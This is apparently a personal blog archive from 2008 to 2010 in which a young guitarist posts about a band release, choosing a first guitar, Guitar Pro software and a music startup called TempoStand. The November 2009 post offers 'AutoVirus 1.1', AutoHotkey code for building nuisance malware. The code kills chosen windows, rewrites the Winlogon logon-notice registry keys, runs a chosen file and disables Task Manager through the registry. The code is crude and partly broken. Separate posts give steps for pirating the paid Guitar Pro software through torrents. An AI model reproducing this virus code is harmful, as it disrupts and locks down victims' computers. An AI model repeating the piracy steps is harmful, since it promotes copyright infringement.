Tuesday, September 28, 2010


Agrath finally release their new new song -- FOREVER

If you do like the page please comment..!!

Thursday, November 26, 2009

-- Presenting to you my very own written AutoVirus 1.1

This will automatically generate a virus script for you..

Check my further posts for more info..!!

#singleinstance force

Gui, Add, StatusBar,, Bar's starting text (omit to start off empty).
SB_SetText("Let the havoc begin!!")

Gui +LastFound ; Make the GUI window the last found window for use by the line below.

Menu, HelpMenu, Add, &About, HelpAbout
Menu, MyMenuBar, Add, &Help, :HelpMenu

Gui, Menu, MyMenuBar

Gui, Add, Picture, x y w265 h160 , %A_ScriptDir%\crossbones640.gif
Gui, Add, text, x16 y220 w260 h30 , ***** WELCOME TO THE WORLD OF CHAOS!!***** What do you seek my master??
Gui, Add, checkbox, x86 y250 w100 h20 vactivate, Delete Script??

Gui, Add, text, x306 y320 w70 h20 , Type to close:
Gui, Add, edit, x306 y340 w250 h20 vtype1, type1
Gui, Add, text, x306 y200 w50 h20 , ahk_class:
Gui, Add, edit, x306 y220 w250 h20 vclass1, class1
Gui, Add, text, x16 y260 w50 h20 , Message:
Gui, Add, edit, x16 y280 w240 h60 vmessage, message
Gui, Add, text, x16 y340 w80 h20 , Startup Caption:
Gui, Add, edit, x16 y360 w240 h20 vcaption, Title
Gui, Add, text, x16 y380 w70 h20 , Startup Text:
Gui, Add, edit, x16 y400 w240 h90 vstartup, Text

Gui, Add, checkbox, x316 y430 w110 h20 vcdlock, Lock CD DRIVE
Gui, Add, checkbox, x316 y450 w110 h20 vunlock, Unlock CD DRIVE
Gui, Add, checkbox, x316 y470 w120 h20 vdistask, Disable Taskmanager
Gui, Add, checkbox, x316 y490 w110 h20 vdisreg, Disable Registry
Gui, Add, checkbox, x446 y470 w120 h20 venatask, Enable Taskmanager
Gui, Add, checkbox, x446 y490 w110 h20 venareg, Enable Registry
Gui, Add, checkbox, x446 y430 w130 h20 vshut, FORCE SHUTDOWN!!
Gui, Add, checkbox, x446 y450 w110 h20 vshutr, FORCE REBOOT!!

Gui, Add, Button, x16 y510 w60 h20 Default, OK
Gui, Add, button, x86 y510 w70 h20 , Cancel
Gui, Add, button, x166 y510 w100 h20 , REMOVE VIRUS!

Gui, Add, text, x246 y540 w100 h20 , By -Sankalp Singha.
Gui, Add, edit, x16 y190 w240 h20 vsource, source
Gui, Add, text, x16 y170 w110 h20 , DESTINATION::
Gui, Add, text, x306 y40 w100 h20 , SOURCE SOUND:
Gui, Add, edit, x306 y60 w250 h21 vsound, Sound
Gui, Add, text, x306 y100 w100 h20 , SOURCE PICTURE:
Gui, Add, edit, x306 y120 w250 h21 vpicture, Picture
Gui, Add, edit, x306 y250 w250 h20 vclass2, class2
Gui, Add, edit, x306 y280 w250 h20 vclass3, class3
Gui, Add, edit, x306 y370 w250 h20 vtype2, type2
Gui, Add, edit, x306 y400 w250 h20 vtype3, type3
Gui, Add, text, x306 y150 w100 h20 , INFO MESSAGE:
Gui, Add, edit, x306 y170 w250 h21 vinfo, info
Gui, Show, x174 y28 h578 w588, AutoVirus 1.1 -Sankalp Singha

Gui, 2:+owner1 ; Make the main window (Gui #1) the owner of the "about box" (Gui #2).
Gui +Disabled ; Disable main window.
Gui, 2:Add, Text,, This program will program an autohot key script according to the specifications given. `nTo learn how to use this program checkout www.sankalpsingha.blogspot.com`n`n Program Created By Sankalp Singha. `n For any comments, suggestions or bug report please contact me at: `n sankalpsingha@gmail.com `n `n Adios!! `n Let the havoc begin!!! `n`n (Note: You have to install AutohotKey software first to use this..)
Gui, 2:Add, Button, Default, OK
Gui, 2:Show

2ButtonOK: ; This section is used by the "about box" above.
Gui, 1:-Disabled ; Re-enable the main window (must be done prior to the next step).
Gui Destroy ; Destroy the about box.




msgbox,16,Information!!, %info%,30

#singleinstance force


WinGetActiveTitle, ed
winclose %type1%
splashimage, %picture%, B fs18 cw800080, %message%
Sleep, 4000
SplashImage, Off

winclose %type2%
splashimage, %picture%, B fs18 cw800080, %message%
Sleep, 4000
SplashImage, Off

winclose %type3%
splashimage, %picture%, B fs18 cw800080, %message%
Sleep, 4000
SplashImage, Off


ifwinactive ahk_class %class1%

winkill ahk_class %class1%
splashimage, %picture%, B fs18 cw800080, %message%
Sleep, 4000
SplashImage, Off


ifwinactive ahk_class %class2%

winkill ahk_class %class2%
splashimage, %picture%, B fs18 cw800080, %message%
Sleep, 4000
SplashImage, Off


ifwinactive ahk_class %class3%

winkill ahk_class %class3%
splashimage, %picture%, B fs18 cw800080, %message%
Sleep, 4000
SplashImage, Off


regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon,LegalNoticeText
ifnotequal,regdata, %startup%
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,LegalNoticeText, %startup%

regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon,LegalNoticeCaption
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,LegalNoticeCaption, %caption%



run %source%

if %activate%

if %cdlock%
msgbox,Drive Locked!!

if %unlock%
msgbox,Drive Unlocked!!

if %shut%

if %shutr%

if %distask%
{ regread,regdata1,REG_DWORD,HKEY_LOCAL_MACHINE,Software\Microsoft\Windows\CurrentVersion\Policies\System ,DisableTaskMgr
Regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,Software\Microsoft\Windows\CurrentVersion\Policies\System ,DisableTaskMgr,1



Note-- you will need to install AutoHotKey to run this script. Just copy it into notepad and save it as virus.ahk


Tuesday, January 6, 2009

Heya friends....

Hey friends... Sorry long time so see(i mean write.. ) its was cause i was very busy out here...

Wednesday, June 25, 2008

Electric guitar or Acoustic guitar??

Should I purchase an electric or acoustic guitar?
A lot of my friends have asked me whether they should purchase an electric guitar or an acoustic, so i decided to relaese this article for them.

Two popular myths:
· You should start with an acoustic guitar because it is harder to play and will make you hands and fingers stronger much more quickly.
· You should start with an electric guitar because it is easier to play.

Choose the type of guitar you are excited about playing.
As a beginning player, your experience with your first instrument is vital to your long-term success. Choosing the right guitar means deciding which type of guitar you personally find exciting and will be the most motivated to play. What kind of music would you like to play? What kind of guitar attracts your attention? Which one can you envision yourself playing? That is the one you will most look forward to practicing and playing. If you just want to play the guitar but are not sure what type to choose then determine a budget and work within those parameters.

Work within the parameters your budget.
Ideally, your choice between the electric or acoustic guitar should be determined solely by a desire for one over the other. However, the choice may realistically be limited by your budget. Starting out with an electric guitar is generally more expensive than an acoustic guitar because of the need for an amplifier and other accessories. If the electric guitar is what you really want but is outside your budget, then a little more time and savings will be well worth the wait.

The easiest guitar to play is the type you are most interested in learning.
Often people want to know what kind of guitar is easier to play. There are physical differences between electric and acoustic guitars that may be considered. However, we believe the kind of guitar you "want" to play is the easiest to learn on, as you will be more likely to establish good practice habits early in the process.

Electric guitars are physically somewhat easier to play.
Electric guitars are physically somewhat easier to play, assuming they are properly adjusted, because they have a smaller body, thinner neck, and use lighter gauge strings. The pickups and amplifier do all the work of projecting the sound, so a lighter touch along with lighter strings makes it easier to play. An electric guitar needs to be plugged into an amplifier, which must be turned on before playing. For some, the extra effort that it takes to plug into an amplifier and turn it on may be enough to keep them from playing as often or taking advantage of a spontaneous moment to pick it up and play.

Acoustic guitars have heavier gauge strings which require slightly firmer picking and fingering.
The wood top of an acoustic guitar must vibrate in order to project the sound. This requires heavier gauge strings along with slightly firmer picking and fingering. The body of the acoustic guitar is much larger than the electric guitar, and usually has a thicker neck to support the tension of the heavier strings. However, some people find the immediate accessibility of an acoustic guitar resting on a stand appealing, making them more apt to pick it up and play more often.

Over time your desire to play another type of guitar will naturally occur.
Don't worry that by choosing one over the other, you have locked yourself into that type of guitar for the rest of your life. Our experience has been that many players who start with one kind of guitar will, in time, gravitate to the other. Motivation for playing an instrument changes over time, and will occur naturally as your skills develop and the desire to play and learn becomes internalized. You will most likely develop skills on both the electric and acoustic guitars and enjoy a lifetime of learning and playing a variety of musical styles.

Most importantly, only select a guitar you know is fully inspected and adjusted for easy playability.
Always get the facts. Ask what has been done to make the instrument easier to play. Many important issues rest on the quality and playability of your instrument. There is no greater impedance to progress, developing proper technique and the enjoyment of learning to play than a poorly constructed instrument or one that is not correctly set up. Both the electric and the acoustic guitar will play with relative ease as long as they are properly adjusted and the size is well suited for the player.

The Myths
Playing the guitar well is not about strength but about control. As you watch any professional musician you will notice how they appear to effortlessly finesse their instrument. The easiest guitar to play is the one you are truly interested in.

- article courtsey of FirstGuitar.com

Wednesday, June 18, 2008

Download GP??? HOW???

Hello again friends, sorry to keep you guys waiting this long, actually was busy attending the NCC Camp out here in Banaras. NCC is a great place to showcase a lot of your talents. Actually all camps are, so if you ever get an opportunity do visit it and awe the people. You seriously get to do a lot of stuff with them. For example-

SHOOTING!!!! And yeah, there’s more to it. My dad was the commanding officer out here so I got lots of privileges too. I even got to do aeromodelling and lots of other stuff. Its great fun to fly a planewhich is self made and which you can really control in the sky. And yeah my dad got pissed that I had my hais long too so I got lots of hair- raising(rather, hair-cutting) experiences too.
Anyways I am not too interested in showing those pics.
Anyways I had promised that I would tell you how to download GP from the net right?? Alright, follow my simple instructions and you would be playing like a pro in hours!! Seriously.
Step 1. Go to www.utorrent.com
Step 2. Download uTorrent
Step 3. Go to site http://search.utorrent.com/search.php?q=guitar%20pro%205&e=http%3a%2f%2fwww.mininova.org%2fsearch%2f%3futorrent%26search%3d&u=1

Step 4. Download the torrent file and access it with your uTorrent... Bingo!!!

Hope You Enjoy!!!

Happy playing!! Goodbye for now though..

Sunday, June 15, 2008

Guitar Pro 5.. Introduction.

I know ear cracking songs can be a hell lot of problems... Ever wondered still how the fellows out there manage to play those songs which you found impossible to crack play it with ease??

Well, nowadays many softwares are availaible but well my personal favourite is Guitar Pro 5. Guitar Pro is a multitrack tablature editor for guitar, banjo and bass. Besides writing scores, Guitar Pro is a useful resource for guitarists from beginner to experienced levels to progress , compose , or simply accompany themselves. I t has a wide range of tablatures( GP tabs) in the net for easy download and it shows you how to play it and you can simaltaneously play with it too..

Original GP on the net is costly. But well, i would say this is where the torrent files come to play.

There are methods to get GP for free... You can check out the original software at www.guitar-pro.com
For that, all you guys would have to wait for my next post..

You can look at the example of GP 5 --

Saturday, June 14, 2008

What is TempoStand??

Well a lot of my friends ask me what is TempoStand?? Well I decided to write up..

Tempostand Music Private Ltd, the startup of the four Dhirubhai Ambani Institute of Information and Communication Technology (DAIICT) pass-outs, later joined by an IIT Roorkie graduate, also offers its service as music partners for events and shows, something similar to being media partners or hospitality partners. Ever since its launch five months ago, www.tempostand.com has been, well, rocking. It already has 184 music bands as members and has been visited by people from over 1,000 cities around the world. And there have been offers from established portals for a buyout. Lucrative offers, politely declined. “We are looking for a strategic investor who can add value to our operations,” says Naman Arora, on of the promoters of Tempostand. Tempostand is a platform to promote independent bands and solo artists who can park their music for free. It’s open for any genre; be it Hindustani, Sufi, Folk, Rock, Jazz, Punk, Carnatic and Blues. “The crazier the better,” say promoters Gaurav Dobhal, Naman Arora, Ujjwal Singh Grover, Aditya Thakur and Rahul Tyagi, with an average age of barely 25. And they believe music should not be limited to the prominent labels to become acceptable. The portal is already a favourite destination for those who want something other than popular music. It receives as many as 3,000 hits a day at the time of online events and live webcasting. For example, if you are unable to make it to the IIM-Ahmedabad’s music festival Chaos that starts next month, just log on to tempostand.com. A live webcast will be just a click away. Tempostand is an outcome of the international business plan competition Eureka, organised by IIT-Bombay, won by the music portal idea of DAIICT’s third year BTech students Gaurav, Naman and Ujjwal Singh. As they moved on to implement their plan in real life, another batchmate and lead guitarist Aditya joined them. The Centre for Entrepreneurship and Incubation at DAIICT (CEID) assisted them in making their dream true. Subsequently, Rahul, an old friend and IIT Rurkee pass-out, joined them. “We have so far partnered with IIM-C, IIT Rurkee and IIT-Mumbai. The portal was officially launched in February 2007 and has been attracting hits from about 1,500 cities from across the world. Our portal is a platform for all the upcoming music artists for free,” says Gaurav. He adds that the promoters are in process of developing a revenue model where the artist can earn for each download of his work. Tempostand is looking to offering its services over the phone. “Our next step is to enter into mobile phone arena with our activities since Internet penetration is not so huge in India,” says another promoter Naman who is based in Gandhinagar. “With online movie and music releases catching up fast, we would be forming tie-ups in the areas of entertainment too,” he adds. Great going. But it was not easy for the youngsters, belonging to middle class families, to float their own venture by pooling in Rs 3 lakh. There was pressure from family members to join the corporate sector that is offering whopping pay packages to ICT students, say the promoters who are operating from different cities. “Now, with response from the listeners, event organisers and sponsors, our families are convinced that we are cut out to make big in the world of enterprising,” says Naman who is based in Gandhinagar.